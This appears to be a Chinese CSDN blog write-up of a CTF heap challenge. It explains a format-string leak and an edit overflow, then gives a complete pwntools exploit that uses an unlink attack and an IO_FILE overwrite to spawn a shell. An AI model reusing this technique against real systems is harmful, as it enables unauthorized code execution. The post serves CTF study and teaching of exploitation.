D0g2019-pwn heap WP

最新推荐文章于 2024-05-03 16:44:55 发布
最新推荐文章于 2024-05-03 16:44:55 发布
阅读量285 收藏
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: 安洵杯第二届
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/103385194
版权

保护

在这里插入图片描述

分析

  • 程序主要漏洞有两个,分别是在一开始的输入操作中:
    在这里插入图片描述
  • 存在格式化字符串漏洞,可以泄露内存。这里首先泄露出程序的基地址和libc的内存,为后续利用做准备。
  • 第二个漏洞存在编辑操作中:
    在这里插入图片描述
  • 程序在创建note的时候做了限制,正常情况下只能申请unsortbin及其以上的chunk。由于一开始我们就可以获得内存,所以直接利用unlink是最快的,然后利用IO_FILE去getshell。

EXP

from pwn import*

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
p=process('./pwn1')
#context.log_level=1

def Add(idx,size,data):
    p.sendlineafter('>> ','1')
    p.sendlineafter(':',str(idx))
    p.sendlineafter('size:\n',str(size))
    p.sendafter('content: \n',data)
def Del(idx):
    p.sendlineafter('>> ','2')
    p.sendlineafter('index:\n',str(idx))
def Edit(idx,data):
    p.sendlineafter('>> ', '4')
    p.sendlineafter('index:\n', str(idx))
    p.sendafter('content: \n', data)

def Login(formt):
    p.sendlineafter('name: ', formt)

Login("%15$p.%11$p.")
p.recvuntil('Hello, ')
libc_addr=int(p.recvuntil('.')[:-1],16)-libc.sym['__libc_start_main']-240
pie=int(p.recvuntil('.')[:-1],16)-4486
success("libc_base:"+hex(libc_addr))
success("PIE:"+hex(pie))

Note_list=0x202060+pie
fake_chunk=p64(0)+p64(0x60)+p64(Note_list-0x18)+p64(Note_list-0x10)+'a'*0x60+p64(0x61)
fake_chunk=fake_chunk.ljust(0x90,'\0')
Add(0,0x98,'a'*8+'\n')
Add(1,0x118,'a'*8+'\n')
Add(3,0x100,'a'*8+'\n')
Edit(0,fake_chunk+p64(0x90)+'\x20')
#unlink
Del(1)
#overwrite
system_addr=libc.sym['system']+libc_addr
std_out=libc.sym['_IO_2_1_stdout_']+libc_addr
pay=p64(0)*3+p64(Note_list)+p64(0x98)
pay+=p64(std_out)+p64(0x100)                #1
pay+=p64(std_out+208)+p64(0x100)            #2
pay+=p64(Note_list+0x30)+p64(0x100)+'\n'    #3
Edit(0,pay)

pay=p64(0)*2+p64(system_addr)*19+'\n'
Edit(3,pay)
pay=p32(0xfabd1880)+';sh;\n'
Edit(1,pay)
pay=p64(0)+p64(Note_list+0x30)+'\n'

p.sendlineafter('>> ', '4')
p.sendlineafter('index:', '2')
p.sendafter('content: ', pay)

p.interactive()
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF6月赛Pwn-azez_heap wp
qq_31457355的博客
10-07 1204
本次比赛是dasctf6月赛,学到了很多东西,感谢 1.首先着重记录一下azez_heap这个题目,剩下的题目放在另一篇博客 知识点: _IO_flush_all_lockp 触发条件 反向shell的利用 分析: checksec: 保护全开,毋庸置疑 通过ida分析可以确定程序的唯一漏洞点在edit里面,可以控制下一个堆块的fd和bk add里面size可以申请到0x2333已经很大了,根据以往的做题经验可以想到要打global_max_fast,而且堆块使用calloc分配,我们知道calloc
Pwn】2019安洵线上赛 Heap
Nothing
12-01 454
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
PWN-HEAP】Unlink学习笔记
SWEET0SWAT的博客
09-02 788
题目练习 HITCON2016 bamboobox 反编译情况: 程序分析
pwn_heap(未完待续)
qq_37439229的博客
10-15 461
早上上信安数基,了解了中国剩余定理,就是求同余方程组的解,找时间,用c++复现以下 pwn_heap 堆 在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。 malloc malloc 函数返回对应大小字节的内存块的指针。此外,该函数还对一些异常情况进行了处理 当 n=0 时,返回当前系统允许的堆的最小内存块。 当 n 为负数时,由于在大多数系统上,size_t 是无符号
星盟-pwn-heap2 (tcache attack,house of orange)
qq_65147345的博客
08-08 1233
通过unsorted-bin泄露出libc_base 通过tcache attack申请到malloc_hook的地址 改写为one_gadget
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CTF PWNheap入门 unlink
L2329794714的博客
09-09 1672
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
buu-pwn-heap刷题日记
abelxu
10-25 1116
一开始的题解忘记记录题解了。每天刷两道pwn题 babyfengshui_33c3_2016 https://blog.csdn.net/qinying001/article/details/104359401 漏洞点在Update函数的比较部分。将des_addr+length和Node_addr - 4进行比较。 [V&N2020 公开赛]simpleHeap https://blog.csdn.net/qq_39869547/article/details/104587504 https://
Pwn】NCTF2019 easy_heap
Nothing
11-29 567
查看程序保护。 分析程序,漏洞在free之后指针没置0,导致uaf;堆的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造堆块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。 from pwn import * ...
heap pwn 入门大全 - 1:glibc heap机制与源码阅读(上)
Zheng__Huang的博客
08-13 644
本文为笔者学习heap pwn时,学习阅读glibc ptmalloc2源码时的笔记,与各位分享。可能存在思维跳跃之处,敬请见谅
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 788
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 685
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
[蓝桥2024]-PWN:ezheap解析(堆glibc2.31,glibc2.31下的double free)
最新发布
2301_79326813的博客
05-03 658
查看保护查看ida大致就是只能创建0x60大小的堆块,并且uaf只能利用一次。
通过一道ARM PWN题引发的思考:jarvisOJ_typo
hollk’s blog
06-28 1331
最近做了一道ARM架构的PWN题,给我带来很多的思考。为什么要做ARM的呢?因为在很久之前就提及过想要向IoT漏洞挖掘方面进行延展,并且有过一段时间去复现一些路由器的漏洞,但是感觉基础并不是很扎实。所以这段时间潜心学习ARM寄存器及指令集,并且通过接下来的这道ARM PWN题进行实践与摸索,文章的末尾也会列出通过这道题带来的一些感悟 希望我们都能找到自己的方向,按照计划不断前行。编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2024
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值